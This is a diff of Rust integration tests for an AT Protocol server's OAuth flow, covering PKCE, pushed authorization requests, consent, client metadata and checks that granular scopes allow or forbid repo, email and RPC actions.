consent_res.json().await.unwrap(); 915 + location = consent_body["redirect_uri"] 916 + .as_str() 917 + .expect("Expected redirect_uri from consent") 918 + .to_string(); 919 + } 483 920 assert!(location.contains("state=")); 484 921 let encoded_state = urlencoding::encode(special_state); 485 - assert!(location.contains(&format!("state={}", encoded_state)), "State should be URL-encoded. Got: {}", location); 922 + assert!( 923 + location.contains(&format!("state={}", encoded_state)), 924 + "State should be URL-encoded. Got: {}", 925 + location 926 + ); 927 + } 928 + 929 + async fn get_oauth_token_with_scope(scope: &str) -> (String, String, String) { 930 + let url = base_url().await; 931 + let http_client = client(); 932 + let ts = Utc::now().timestamp_millis(); 933 + let handle = format!("scope-test-{}", ts); 934 + let email = format!("scope-test-{}@example.com", ts); 935 + let password = "scope-test-password"; 936 + let create_res = http_client 937 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 938 + .json(&json!({ "handle": handle, "email": email, "password": password })) 939 + .send() 940 + .await 941 + .unwrap(); 942 + assert_eq!(create_res.status(), StatusCode::OK); 943 + let account: Value = create_res.json().await.unwrap(); 944 + let user_did = account["did"].as_str().unwrap().to_string(); 945 + verify_new_account(&http_client, &user_did).await; 946 + let redirect_uri = "https://example.com/scope-callback"; 947 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 948 + let client_id = mock_client.uri(); 949 + let (code_verifier, code_challenge) = generate_pkce(); 950 + let par_res = http_client 951 + .post(format!("{}/oauth/par", url)) 952 + .form(&[ 953 + ("response_type", "code"), 954 + ("client_id", &client_id), 955 + ("redirect_uri", redirect_uri), 956 + ("code_challenge", &code_challenge), 957 + ("code_challenge_method", "S256"), 958 + ("scope", scope), 959 + ("state", "test"), 960 + ]) 961 + .send() 962 + .await 963 + .unwrap(); 964 + assert_eq!( 965 + par_res.status(), 966 + StatusCode::CREATED, 967 + "PAR should succeed for scope: {}", 968 + scope 969 + ); 970 + let par_body: Value = par_res.json().await.unwrap(); 971 + let request_uri = par_body["request_uri"].as_str().unwrap(); 972 + let auth_res = http_client 973 + .post(format!("{}/oauth/authorize", url)) 974 + .header("Content-Type", "application/json") 975 + .header("Accept", "application/json") 976 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 977 + .send().await.unwrap(); 978 + assert_eq!(auth_res.status(), StatusCode::OK); 979 + let auth_body: Value = auth_res.json().await.unwrap(); 980 + let mut location = auth_body["redirect_uri"] 981 + .as_str() 982 + .expect("Expected redirect_uri") 983 + .to_string(); 984 + if location.contains("/oauth/consent") { 985 + let approved_scopes: Vec<&str> = scope.split_whitespace().collect(); 986 + let consent_res = http_client 987 + .post(format!("{}/oauth/authorize/consent", url)) 988 + .header("Content-Type", "application/json") 989 + .json(&json!({"request_uri": request_uri, "approved_scopes": approved_scopes, "remember": false})) 990 + .send().await.unwrap(); 991 + let consent_status = consent_res.status(); 992 + let consent_body: Value = consent_res.json().await.unwrap(); 993 + assert_eq!( 994 + consent_status, 995 + StatusCode::OK, 996 + "Consent should succeed. Scope: {}, Body: {:?}", 997 + scope, 998 + consent_body 999 + ); 1000 + location = consent_body["redirect_uri"] 1001 + .as_str() 1002 + .expect("Expected redirect_uri from consent") 1003 + .to_string(); 1004 + } 1005 + let code = location 1006 + .split("code=") 1007 + .nth(1) 1008 + .unwrap() 1009 + .split('&') 1010 + .next() 1011 + .unwrap(); 1012 + let token_res = http_client 1013 + .post(format!("{}/oauth/token", url)) 1014 + .form(&[ 1015 + ("grant_type", "authorization_code"), 1016 + ("code", code), 1017 + ("redirect_uri", redirect_uri), 1018 + ("code_verifier", &code_verifier), 1019 + ("client_id", &client_id), 1020 + ]) 1021 + .send() 1022 + .await 1023 + .unwrap(); 1024 + assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed"); 1025 + let token_body: Value = token_res.json().await.unwrap(); 1026 + let access_token = token_body["access_token"].as_str().unwrap().to_string(); 1027 + (access_token, user_did, handle) 1028 + } 1029 + 1030 + #[tokio::test] 1031 + async fn test_granular_scope_repo_create_only() { 1032 + let url = base_url().await; 1033 + let http_client = client(); 1034 + let (token, did, _) = 1035 + get_oauth_token_with_scope("repo:app.bsky.feed.post?action=create blob:*/*").await; 1036 + let now = chrono::Utc::now().to_rfc3339(); 1037 + let create_res = http_client 1038 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1039 + .bearer_auth(&token) 1040 + .json(&json!({ 1041 + "repo": &did, 1042 + "collection": "app.bsky.feed.post", 1043 + "record": { "$type": "app.bsky.feed.post", "text": "test post", "createdAt": now } 1044 + })) 1045 + .send() 1046 + .await 1047 + .unwrap(); 1048 + assert_eq!( 1049 + create_res.status(), 1050 + StatusCode::OK, 1051 + "Should allow creating posts with repo:app.bsky.feed.post?action=create" 1052 + ); 1053 + let body: Value = create_res.json().await.unwrap(); 1054 + let uri = body["uri"].as_str().expect("Should have uri"); 1055 + let rkey = uri.split('/').last().unwrap(); 1056 + let delete_res = http_client 1057 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 1058 + .bearer_auth(&token) 1059 + .json(&json!({ "repo": &did, "collection": "app.bsky.feed.post", "rkey": rkey })) 1060 + .send() 1061 + .await 1062 + .unwrap(); 1063 + assert_eq!( 1064 + delete_res.status(), 1065 + StatusCode::FORBIDDEN, 1066 + "Should NOT allow deleting with create-only scope" 1067 + ); 1068 + let like_res = http_client 1069 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1070 + .bearer_auth(&token) 1071 + .json(&json!({ 1072 + "repo": &did, 1073 + "collection": "app.bsky.feed.like", 1074 + "record": { "$type": "app.bsky.feed.like", "subject": { "uri": uri, "cid": body["cid"] }, "createdAt": now } 1075 + })) 1076 + .send().await.unwrap(); 1077 + assert_eq!( 1078 + like_res.status(), 1079 + StatusCode::FORBIDDEN, 1080 + "Should NOT allow creating likes (wrong collection)" 1081 + ); 1082 + } 1083 + 1084 + #[tokio::test] 1085 + async fn test_granular_scope_wildcard_collection() { 1086 + let url = base_url().await; 1087 + let http_client = client(); 1088 + let (token, did, _) = get_oauth_token_with_scope( 1089 + "repo:app.bsky.*?action=create&action=update&action=delete blob:*/*", 1090 + ) 1091 + .await; 1092 + let now = chrono::Utc::now().to_rfc3339(); 1093 + let post_res = http_client 1094 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1095 + .bearer_auth(&token) 1096 + .json(&json!({ 1097 + "repo": &did, 1098 + "collection": "app.bsky.feed.post", 1099 + "record": { "$type": "app.bsky.feed.post", "text": "wildcard test", "createdAt": now } 1100 + })) 1101 + .send() 1102 + .await 1103 + .unwrap(); 1104 + assert_eq!( 1105 + post_res.status(), 1106 + StatusCode::OK, 1107 + "Should allow app.bsky.feed.post with app.bsky.* scope" 1108 + ); 1109 + let body: Value = post_res.json().await.unwrap(); 1110 + let uri = body["uri"].as_str().unwrap(); 1111 + let rkey = uri.split('/').last().unwrap(); 1112 + let delete_res = http_client 1113 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 1114 + .bearer_auth(&token) 1115 + .json(&json!({ "repo": &did, "collection": "app.bsky.feed.post", "rkey": rkey })) 1116 + .send() 1117 + .await 1118 + .unwrap(); 1119 + assert_eq!( 1120 + delete_res.status(), 1121 + StatusCode::OK, 1122 + "Should allow delete with action=delete" 1123 + ); 1124 + let other_res = http_client 1125 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 1126 + .bearer_auth(&token) 1127 + .json(&json!({ 1128 + "repo": &did, 1129 + "collection": "com.example.record", 1130 + "record": { "$type": "com.example.record", "data": "test", "createdAt": now } 1131 + })) 1132 + .send() 1133 + .await 1134 + .unwrap(); 1135 + assert_eq!( 1136 + other_res.status(), 1137 + StatusCode::FORBIDDEN, 1138 + "Should NOT allow com.example.* with app.bsky.* scope" 1139 + ); 1140 + } 1141 + 1142 + #[tokio::test] 1143 + async fn test_granular_scope_email_read() { 1144 + let url = base_url().await; 1145 + let http_client = client(); 1146 + let (token, did, _) = get_oauth_token_with_scope("account:email?action=read").await; 1147 + let session_res = http_client 1148 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1149 + .bearer_auth(&token) 1150 + .send() 1151 + .await 1152 + .unwrap(); 1153 + assert_eq!(session_res.status(), StatusCode::OK); 1154 + let body: Value = session_res.json().await.unwrap(); 1155 + assert_eq!(body["did"], did); 1156 + assert!( 1157 + body["email"].is_string(), 1158 + "Email should be visible with account:email?action=read. Got: {:?}", 1159 + body 1160 + ); 1161 + } 1162 + 1163 + #[tokio::test] 1164 + async fn test_granular_scope_no_email_access() { 1165 + let url = base_url().await; 1166 + let http_client = client(); 1167 + let (token, did, _) = get_oauth_token_with_scope("repo:*?action=create blob:*/*").await; 1168 + let session_res = http_client 1169 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 1170 + .bearer_auth(&token) 1171 + .send() 1172 + .await 1173 + .unwrap(); 1174 + assert_eq!(session_res.status(), StatusCode::OK); 1175 + let body: Value = session_res.json().await.unwrap(); 1176 + assert_eq!(body["did"], did); 1177 + assert!( 1178 + body["email"].is_null() || body.get("email").is_none(), 1179 + "Email should be hidden without account:email scope. Got: {:?}", 1180 + body["email"] 1181 + ); 1182 + } 1183 + 1184 + #[tokio::test] 1185 + async fn test_granular_scope_rpc_specific_method() { 1186 + let url = base_url().await; 1187 + let http_client = client(); 1188 + let (token, _, _) = get_oauth_token_with_scope("rpc:app.bsky.feed.getTimeline?aud=*").await; 1189 + let allowed_res = http_client 1190 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url)) 1191 + .bearer_auth(&token) 1192 + .query(&[ 1193 + ("aud", "did:web:api.bsky.app"), 1194 + ("lxm", "app.bsky.feed.getTimeline"), 1195 + ]) 1196 + .send() 1197 + .await 1198 + .unwrap(); 1199 + assert_eq!( 1200 + allowed_res.status(), 1201 + StatusCode::OK, 1202 + "Should allow getServiceAuth for app.bsky.feed.getTimeline" 1203 + ); 1204 + let body: Value = allowed_res.json().await.unwrap(); 1205 + assert!(body["token"].is_string(), "Should return service token"); 1206 + let blocked_res = http_client 1207 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url)) 1208 + .bearer_auth(&token) 1209 + .query(&[ 1210 + ("aud", "did:web:api.bsky.app"), 1211 + ("lxm", "app.bsky.feed.getAuthorFeed"), 1212 + ]) 1213 + .send() 1214 + .await 1215 + .unwrap(); 1216 + assert_eq!( 1217 + blocked_res.status(), 1218 + StatusCode::FORBIDDEN, 1219 + "Should NOT allow getServiceAuth for app.bsky.feed.getAuthorFeed" 1220 + ); 1221 + let blocked_body: Value = blocked_res.json().await.unwrap(); 1222 + assert!( 1223 + blocked_body["error"] 1224 + .as_str() 1225 + .unwrap_or("") 1226 + .contains("Scope") 1227 + || blocked_body["message"] 1228 + .as_str() 1229 + .unwrap_or("") 1230 + .contains("scope"), 1231 + "Should mention scope restriction: {:?}", 1232 + blocked_body 1233 + ); 1234 + let no_lxm_res = http_client 1235 + .get(format!("{}/xrpc/com.atproto.server.getServiceAuth", url)) 1236 + .bearer_auth(&token) 1237 + .query(&[("aud", "did:web:api.bsky.app")]) 1238 + .send() 1239 + .await 1240 + .unwrap(); 1241 + assert_eq!( 1242 + no_lxm_res.status(), 1243 + StatusCode::BAD_REQUEST, 1244 + "Should require lxm parameter for granular scopes" 1245 + ); 486 1246 }
+66 -27
tests/oauth_client_metadata.rs
··· 7 7 async fn test_frontend_client_metadata_returns_valid_json() { 8 8 let client = client(); 9 9 let res = client 10 - .get(format!( 11 - "{}/oauth/client-metadata.json", 12 - base_url().await 13 - )) 10 + .get(format!("{}/oauth/client-metadata.json", base_url().await)) 14 11 .send() 15 12 .await 16 13 .expect("Failed to send request"); 17 14 assert_eq!(res.status(), StatusCode::OK); 18 15 let body: Value = res.json().await.expect("Should return valid JSON"); 19 - assert!(body["client_id"].as_str().is_some(), "Should have client_id"); 20 - assert!(body["client_name"].as_str().is_some(), "Should have client_name"); 21 - assert!(body["redirect_uris"].as_array().is_some(), "Should have redirect_uris"); 22 - assert!(body["grant_types"].as_array().is_some(), "Should have grant_types"); 23 - assert!(body["response_types"].as_array().is_some(), "Should have response_types"); 16 + assert!( 17 + body["client_id"].as_str().is_some(), 18 + "Should have client_id" 19 + ); 20 + assert!( 21 + body["client_name"].as_str().is_some(), 22 + "Should have client_name" 23 + ); 24 + assert!( 25 + body["redirect_uris"].as_array().is_some(), 26 + "Should have redirect_uris" 27 + ); 28 + assert!( 29 + body["grant_types"].as_array().is_some(), 30 + "Should have grant_types" 31 + ); 32 + assert!( 33 + body["response_types"].as_array().is_some(), 34 + "Should have response_types" 35 + ); 24 36 assert!(body["scope"].as_str().is_some(), "Should have scope"); 25 - assert!(body["token_endpoint_auth_method"].as_str().is_some(), "Should have token_endpoint_auth_method"); 37 + assert!( 38 + body["token_endpoint_auth_method"].as_str().is_some(), 39 + "Should have token_endpoint_auth_method" 40 + ); 26 41 } 27 42 28 43 #[tokio::test] 29 44 async fn test_frontend_client_metadata_correct_values() { 30 45 let client = client(); 31 46 let res = client 32 - .get(format!( 33 - "{}/oauth/client-metadata.json", 34 - base_url().await 35 - )) 47 + .get(format!("{}/oauth/client-metadata.json", base_url().await)) 36 48 .send() 37 49 .await 38 50 .expect("Failed to send request"); 39 51 assert_eq!(res.status(), StatusCode::OK); 40 52 let body: Value = res.json().await.unwrap(); 41 53 let client_id = body["client_id"].as_str().unwrap(); 42 - assert!(client_id.ends_with("/oauth/client-metadata.json"), "client_id should end with /oauth/client-metadata.json"); 54 + assert!( 55 + client_id.ends_with("/oauth/client-metadata.json"), 56 + "client_id should end with /oauth/client-metadata.json" 57 + ); 43 58 let grant_types = body["grant_types"].as_array().unwrap(); 44 59 let grant_strs: Vec<&str> = grant_types.iter().filter_map(|v| v.as_str()).collect(); 45 - assert!(grant_strs.contains(&"authorization_code"), "Should support authorization_code grant"); 46 - assert!(grant_strs.contains(&"refresh_token"), "Should support refresh_token grant"); 60 + assert!( 61 + grant_strs.contains(&"authorization_code"), 62 + "Should support authorization_code grant" 63 + ); 64 + assert!( 65 + grant_strs.contains(&"refresh_token"), 66 + "Should support refresh_token grant" 67 + ); 47 68 let response_types = body["response_types"].as_array().unwrap(); 48 69 let response_strs: Vec<&str> = response_types.iter().filter_map(|v| v.as_str()).collect(); 49 - assert!(response_strs.contains(&"code"), "Should support code response type"); 50 - assert_eq!(body["token_endpoint_auth_method"].as_str(), Some("none"), "Should be public client (none auth)"); 51 - assert_eq!(body["application_type"].as_str(), Some("web"), "Should be web application"); 52 - assert_eq!(body["dpop_bound_access_tokens"].as_bool(), Some(false), "Should not require DPoP"); 70 + assert!( 71 + response_strs.contains(&"code"), 72 + "Should support code response type" 73 + ); 74 + assert_eq!( 75 + body["token_endpoint_auth_method"].as_str(), 76 + Some("none"), 77 + "Should be public client (none auth)" 78 + ); 79 + assert_eq!( 80 + body["application_type"].as_str(), 81 + Some("web"), 82 + "Should be web application" 83 + ); 84 + assert_eq!( 85 + body["dpop_bound_access_tokens"].as_bool(), 86 + Some(false), 87 + "Should not require DPoP" 88 + ); 53 89 let scope = body["scope"].as_str().unwrap(); 54 90 assert!(scope.contains("atproto"), "Scope should include atproto"); 55 91 } ··· 58 94 async fn test_frontend_client_metadata_redirect_uri_matches_client_uri() { 59 95 let client = client(); 60 96 let res = client 61 - .get(format!( 62 - "{}/oauth/client-metadata.json", 63 - base_url().await 64 - )) 97 + .get(format!("{}/oauth/client-metadata.json", base_url().await)) 65 98 .send() 66 99 .await 67 100 .expect("Failed to send request"); ··· 69 102 let body: Value = res.json().await.unwrap(); 70 103 let client_uri = body["client_uri"].as_str().unwrap(); 71 104 let redirect_uris = body["redirect_uris"].as_array().unwrap(); 72 - assert!(!redirect_uris.is_empty(), "Should have at least one redirect URI"); 105 + assert!( 106 + !redirect_uris.is_empty(), 107 + "Should have at least one redirect URI" 108 + ); 73 109 let redirect_uri = redirect_uris[0].as_str().unwrap(); 74 - assert!(redirect_uri.starts_with(client_uri), "Redirect URI should be on same origin as client_uri"); 110 + assert!( 111 + redirect_uri.starts_with(client_uri), 112 + "Redirect URI should be on same origin as client_uri" 113 + ); 75 114 }
+79 -49
tests/oauth_lifecycle.rs
··· 5 5 use chrono::Utc; 6 6 use common::{base_url, client}; 7 7 use helpers::verify_new_account; 8 - use reqwest::{StatusCode, redirect}; 8 + use reqwest::StatusCode; 9 9 use serde_json::{Value, json}; 10 10 use sha2::{Digest, Sha256}; 11 11 use wiremock::matchers::{method, path}; ··· 19 19 let hash = hasher.finalize(); 20 20 let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 21 21 (code_verifier, code_challenge) 22 - } 23 - 24 - fn no_redirect_client() -> reqwest::Client { 25 - reqwest::Client::builder() 26 - .redirect(redirect::Policy::none()) 27 - .build() 28 - .unwrap() 29 22 } 30 23 31 24 async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { ··· 102 95 ); 103 96 let par_body: Value = par_res.json().await.unwrap(); 104 97 let request_uri = par_body["request_uri"].as_str().unwrap(); 105 - let auth_client = no_redirect_client(); 106 - let auth_res = auth_client 98 + let auth_res = http_client 107 99 .post(format!("{}/oauth/authorize", url)) 108 - .form(&[ 109 - ("request_uri", request_uri), 110 - ("username", &handle), 111 - ("password", &password), 112 - ("remember_device", "false"), 113 - ]) 100 + .header("Content-Type", "application/json") 101 + .header("Accept", "application/json") 102 + .json(&json!({ 103 + "request_uri": request_uri, 104 + "username": &handle, 105 + "password": &password, 106 + "remember_device": false 107 + })) 114 108 .send() 115 109 .await 116 110 .expect("Authorize failed"); 117 - let location = auth_res 118 - .headers() 119 - .get("location") 120 - .unwrap() 121 - .to_str() 122 - .unwrap(); 111 + assert_eq!( 112 + auth_res.status(), 113 + StatusCode::OK, 114 + "Authorize should return OK" 115 + ); 116 + let auth_body: Value = auth_res.json().await.unwrap(); 117 + let mut location = auth_body["redirect_uri"] 118 + .as_str() 119 + .expect("Expected redirect_uri") 120 + .to_string(); 121 + if location.contains("/oauth/consent") { 122 + let consent_res = http_client 123 + .post(format!("{}/oauth/authorize/consent", url)) 124 + .header("Content-Type", "application/json") 125 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 126 + .send().await.expect("Consent request failed"); 127 + assert_eq!( 128 + consent_res.status(), 129 + StatusCode::OK, 130 + "Consent should succeed" 131 + ); 132 + let consent_body: Value = consent_res.json().await.unwrap(); 133 + location = consent_body["redirect_uri"] 134 + .as_str() 135 + .expect("Expected redirect_uri from consent") 136 + .to_string(); 137 + } 123 138 let code = location 124 139 .split("code=") 125 140 .nth(1) ··· 596 611 .unwrap(); 597 612 let par_body1: Value = par_res1.json().await.unwrap(); 598 613 let request_uri1 = par_body1["request_uri"].as_str().unwrap(); 599 - let auth_client = no_redirect_client(); 600 - let auth_res1 = auth_client 614 + let auth_res1 = http_client 601 615 .post(format!("{}/oauth/authorize", url)) 602 - .form(&[ 603 - ("request_uri", request_uri1), 604 - ("username", &handle), 605 - ("password", password), 606 - ("remember_device", "false"), 607 - ]) 616 + .header("Content-Type", "application/json") 617 + .header("Accept", "application/json") 618 + .json(&json!({ 619 + "request_uri": request_uri1, 620 + "username": &handle, 621 + "password": password, 622 + "remember_device": false 623 + })) 608 624 .send() 609 625 .await 610 626 .unwrap(); 611 - let location1 = auth_res1 612 - .headers() 613 - .get("location") 614 - .unwrap() 615 - .to_str() 616 - .unwrap(); 627 + assert_eq!(auth_res1.status(), StatusCode::OK); 628 + let auth_body1: Value = auth_res1.json().await.unwrap(); 629 + let mut location1 = auth_body1["redirect_uri"].as_str().unwrap().to_string(); 630 + if location1.contains("/oauth/consent") { 631 + let consent_res = http_client 632 + .post(format!("{}/oauth/authorize/consent", url)) 633 + .header("Content-Type", "application/json") 634 + .json(&json!({"request_uri": request_uri1, "approved_scopes": ["atproto"], "remember": false})) 635 + .send().await.unwrap(); 636 + let consent_body: Value = consent_res.json().await.unwrap(); 637 + location1 = consent_body["redirect_uri"].as_str().unwrap().to_string(); 638 + } 617 639 let code1 = location1 618 640 .split("code=") 619 641 .nth(1) ··· 650 672 .unwrap(); 651 673 let par_body2: Value = par_res2.json().await.unwrap(); 652 674 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 653 - let auth_res2 = auth_client 675 + let auth_res2 = http_client 654 676 .post(format!("{}/oauth/authorize", url)) 655 - .form(&[ 656 - ("request_uri", request_uri2), 657 - ("username", &handle), 658 - ("password", password), 659 - ("remember_device", "false"), 660 - ]) 677 + .header("Content-Type", "application/json") 678 + .header("Accept", "application/json") 679 + .json(&json!({ 680 + "request_uri": request_uri2, 681 + "username": &handle, 682 + "password": password, 683 + "remember_device": false 684 + })) 661 685 .send() 662 686 .await 663 687 .unwrap(); 664 - let location2 = auth_res2 665 - .headers() 666 - .get("location") 667 - .unwrap() 668 - .to_str() 669 - .unwrap(); 688 + assert_eq!(auth_res2.status(), StatusCode::OK); 689 + let auth_body2: Value = auth_res2.json().await.unwrap(); 690 + let mut location2 = auth_body2["redirect_uri"].as_str().unwrap().to_string(); 691 + if location2.contains("/oauth/consent") { 692 + let consent_res = http_client 693 + .post(format!("{}/oauth/authorize/consent", url)) 694 + .header("Content-Type", "application/json") 695 + .json(&json!({"request_uri": request_uri2, "approved_scopes": ["atproto"], "remember": false})) 696 + .send().await.unwrap(); 697 + let consent_body: Value = consent_res.json().await.unwrap(); 698 + location2 = consent_body["redirect_uri"].as_str().unwrap().to_string(); 699 + } 670 700 let code2 = location2 671 701 .split("code=") 672 702 .nth(1)
+753
tests/oauth_scopes.rs
··· 1 + mod common; 2 + mod helpers; 3 + 4 + use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 5 + use chrono::Utc; 6 + use common::{base_url, client}; 7 + use helpers::verify_new_account; 8 + use reqwest::StatusCode; 9 + use serde_json::{Value, json}; 10 + use sha2::{Digest, Sha256}; 11 + use wiremock::matchers::{method, path}; 12 + use wiremock::{Mock, MockServer, ResponseTemplate}; 13 + 14 + fn generate_pkce() -> (String, String) { 15 + let verifier_bytes: [u8; 32] = rand::random(); 16 + let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); 17 + let mut hasher = Sha256::new(); 18 + hasher.update(code_verifier.as_bytes()); 19 + let hash = hasher.finalize(); 20 + let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 21 + (code_verifier, code_challenge) 22 + } 23 + 24 + async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer { 25 + let mock_server = MockServer::start().await; 26 + let client_id = mock_server.uri(); 27 + let metadata = json!({ 28 + "client_id": client_id, 29 + "client_name": "Test OAuth Scope Client", 30 + "redirect_uris": [redirect_uri], 31 + "grant_types": ["authorization_code", "refresh_token"], 32 + "response_types": ["code"], 33 + "token_endpoint_auth_method": "none", 34 + "dpop_bound_access_tokens": false 35 + }); 36 + Mock::given(method("GET")) 37 + .and(path("/")) 38 + .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 39 + .mount(&mock_server) 40 + .await; 41 + mock_server 42 + } 43 + 44 + struct OAuthSession { 45 + access_token: String, 46 + #[allow(dead_code)] 47 + refresh_token: String, 48 + did: String, 49 + #[allow(dead_code)] 50 + client_id: String, 51 + scope: String, 52 + } 53 + 54 + async fn create_user_and_oauth_session_with_scope( 55 + handle_prefix: &str, 56 + redirect_uri: &str, 57 + scope: &str, 58 + ) -> (OAuthSession, MockServer) { 59 + let url = base_url().await; 60 + let http_client = client(); 61 + let ts = Utc::now().timestamp_millis(); 62 + let handle = format!("{}-{}", handle_prefix, ts); 63 + let email = format!("{}-{}@example.com", handle_prefix, ts); 64 + let password = format!("{}-password", handle_prefix); 65 + 66 + let create_res = http_client 67 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 68 + .json(&json!({ 69 + "handle": handle, 70 + "email": email, 71 + "password": password 72 + })) 73 + .send() 74 + .await 75 + .expect("Account creation failed"); 76 + assert_eq!(create_res.status(), StatusCode::OK); 77 + let account: Value = create_res.json().await.unwrap(); 78 + let user_did = account["did"].as_str().unwrap().to_string(); 79 + 80 + let _ = verify_new_account(&http_client, &user_did).await; 81 + 82 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 83 + let client_id = mock_client.uri(); 84 + let (code_verifier, code_challenge) = generate_pkce(); 85 + 86 + let par_res = http_client 87 + .post(format!("{}/oauth/par", url)) 88 + .form(&[ 89 + ("response_type", "code"), 90 + ("client_id", &client_id), 91 + ("redirect_uri", redirect_uri), 92 + ("code_challenge", &code_challenge), 93 + ("code_challenge_method", "S256"), 94 + ("scope", scope), 95 + ]) 96 + .send() 97 + .await 98 + .expect("PAR failed"); 99 + assert!( 100 + par_res.status() == StatusCode::OK || par_res.status() == StatusCode::CREATED, 101 + "PAR should succeed, got {}", 102 + par_res.status() 103 + ); 104 + let par_body: Value = par_res.json().await.unwrap(); 105 + let request_uri = par_body["request_uri"].as_str().unwrap(); 106 + 107 + let auth_res = http_client 108 + .post(format!("{}/oauth/authorize", url)) 109 + .header("Content-Type", "application/json") 110 + .header("Accept", "application/json") 111 + .json(&json!({ 112 + "request_uri": request_uri, 113 + "username": &handle, 114 + "password": &password, 115 + "remember_device": false 116 + })) 117 + .send() 118 + .await 119 + .expect("Authorize failed"); 120 + assert_eq!( 121 + auth_res.status(), 122 + StatusCode::OK, 123 + "Authorize should return OK" 124 + ); 125 + let auth_body: Value = auth_res.json().await.unwrap(); 126 + let mut location = auth_body["redirect_uri"] 127 + .as_str() 128 + .expect("Expected redirect_uri") 129 + .to_string(); 130 + if location.contains("/oauth/consent") { 131 + let consent_res = http_client 132 + .post(format!("{}/oauth/authorize/consent", url)) 133 + .header("Content-Type", "application/json") 134 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 135 + .send().await.expect("Consent request failed"); 136 + assert_eq!( 137 + consent_res.status(), 138 + StatusCode::OK, 139 + "Consent should succeed" 140 + ); 141 + let consent_body: Value = consent_res.json().await.unwrap(); 142 + location = consent_body["redirect_uri"] 143 + .as_str() 144 + .expect("Expected redirect_uri from consent") 145 + .to_string(); 146 + } 147 + let code = location 148 + .split("code=") 149 + .nth(1) 150 + .unwrap() 151 + .split('&') 152 + .next() 153 + .unwrap(); 154 + 155 + let token_res = http_client 156 + .post(format!("{}/oauth/token", url)) 157 + .form(&[ 158 + ("grant_type", "authorization_code"), 159 + ("code", code), 160 + ("redirect_uri", redirect_uri), 161 + ("code_verifier", &code_verifier), 162 + ("client_id", &client_id), 163 + ]) 164 + .send() 165 + .await 166 + .expect("Token request failed"); 167 + assert_eq!(token_res.status(), StatusCode::OK); 168 + let token_body: Value = token_res.json().await.unwrap(); 169 + 170 + let session = OAuthSession { 171 + access_token: token_body["access_token"].as_str().unwrap().to_string(), 172 + refresh_token: token_body["refresh_token"].as_str().unwrap().to_string(), 173 + did: user_did, 174 + client_id, 175 + scope: scope.to_string(), 176 + }; 177 + (session, mock_client) 178 + } 179 + 180 + #[tokio::test] 181 + async fn test_atproto_scope_allows_full_access() { 182 + let url = base_url().await; 183 + let http_client = client(); 184 + let (session, _mock) = create_user_and_oauth_session_with_scope( 185 + "scope-full", 186 + "https://example.com/callback", 187 + "atproto", 188 + ) 189 + .await; 190 + 191 + let collection = "app.bsky.feed.post"; 192 + let create_res = http_client 193 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 194 + .bearer_auth(&session.access_token) 195 + .json(&json!({ 196 + "repo": session.did, 197 + "collection": collection, 198 + "record": { 199 + "$type": collection, 200 + "text": "Full access post", 201 + "createdAt": Utc::now().to_rfc3339() 202 + } 203 + })) 204 + .send() 205 + .await 206 + .unwrap(); 207 + 208 + assert_eq!( 209 + create_res.status(), 210 + StatusCode::OK, 211 + "atproto scope should allow creating records" 212 + ); 213 + let create_body: Value = create_res.json().await.unwrap(); 214 + let rkey = create_body["uri"] 215 + .as_str() 216 + .unwrap() 217 + .split('/') 218 + .last() 219 + .unwrap(); 220 + 221 + let put_res = http_client 222 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", url)) 223 + .bearer_auth(&session.access_token) 224 + .json(&json!({ 225 + "repo": session.did, 226 + "collection": collection, 227 + "rkey": rkey, 228 + "record": { 229 + "$type": collection, 230 + "text": "Updated post", 231 + "createdAt": Utc::now().to_rfc3339() 232 + } 233 + })) 234 + .send() 235 + .await 236 + .unwrap(); 237 + assert_eq!( 238 + put_res.status(), 239 + StatusCode::OK, 240 + "atproto scope should allow updating records" 241 + ); 242 + 243 + let delete_res = http_client 244 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", url)) 245 + .bearer_auth(&session.access_token) 246 + .json(&json!({ 247 + "repo": session.did, 248 + "collection": collection, 249 + "rkey": rkey 250 + })) 251 + .send() 252 + .await 253 + .unwrap(); 254 + assert_eq!( 255 + delete_res.status(), 256 + StatusCode::OK, 257 + "atproto scope should allow deleting records" 258 + ); 259 + } 260 + 261 + #[tokio::test] 262 + async fn test_atproto_scope_allows_blob_upload() { 263 + let url = base_url().await; 264 + let http_client = client(); 265 + let (session, _mock) = create_user_and_oauth_session_with_scope( 266 + "scope-blob", 267 + "https://example.com/callback", 268 + "atproto", 269 + ) 270 + .await; 271 + 272 + let blob_data = b"Test blob data for scope test"; 273 + let upload_res = http_client 274 + .post(format!("{}/xrpc/com.atproto.repo.uploadBlob", url)) 275 + .bearer_auth(&session.access_token) 276 + .header("Content-Type", "text/plain") 277 + .body(blob_data.to_vec()) 278 + .send() 279 + .await 280 + .unwrap(); 281 + 282 + assert_eq!( 283 + upload_res.status(), 284 + StatusCode::OK, 285 + "atproto scope should allow blob upload" 286 + ); 287 + let upload_body: Value = upload_res.json().await.unwrap(); 288 + 